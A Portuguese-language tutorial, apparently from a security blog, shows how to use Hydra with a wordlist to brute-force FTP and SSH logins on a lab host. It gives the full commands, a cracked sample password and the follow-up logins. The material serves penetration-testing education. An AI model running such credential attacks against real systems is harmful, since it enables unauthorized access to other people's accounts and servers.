O Hydra é uma excelente ferramenta para realizar ataques para testar a segurança, os ataques podem ser realizados através de uma lista de palavras “wordlist” contendo possíveis usuários ou senhas. Por isso que é importante reforçar que manter a documentação atualizada de sistemas, equipamentos, aplicações é importante.
Site Oficial: www.thc.org/thc-hydra/
Veja alguns exemplos básicos de como utilizar o Hydra:
Passo 01
Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário.
Ataque a um servidor FTP ( 10.10.10.123 )
Passo 01
root@kali:~# hydra -l 100security -P senhas.txt 10.10.10.123 ftp
-l : Define o login do usuário 100security : Login do usuário a ser verificado -P : Define o arquivo contendo as possíveis senhas “wordlist” senhas.txt : Arquivo que contém as possíveis senhas do usuário informado 10.10.10.123 : IP do servidor FTP ftp : Tipo do serviço a ser verificado
Ao realizar o ataque a senha do usuário informado é revelada caso esteja no arquivo senhas.txt
Login: 100security Password: P@ssw0rd
Passo 02
Realizando o acesso via FTP para certificar o usuário e a senha
root@kali:~# ftp 10.10.10.123
Como pode observar o acesso é realizado com sucesso
Ataque a um servidor SSH ( 10.10.10.123 )
Passo 01
root@kali:~# hydra -l 100security -P senhas.txt 10.10.10.123 ssh
-l : Define o login do usuário 100security : Login do usuário a ser verificado -P : Define o arquivo contendo as possíveis senhas “wordlist” senhas.txt : Arquivo que contém as possíveis senhas do usuário informado 10.10.10.123 : IP do servidor SSH ssh : Tipo do serviço a ser verificado
Ao realizar o ataque a senha do usuário informado é revelada caso esteja no arquivo senhas.txt
Login: 100security Password: P@ssw0rd
Passo 02
Realizando o acesso via SSH para certificar o usuário e a senha
root@kali:~# ssh -l 100security 10.10.10.123
Informe a senha encontrada P@ssw0rd
Passo 03
Acesso ao servidor via SSH realizado com sucesso
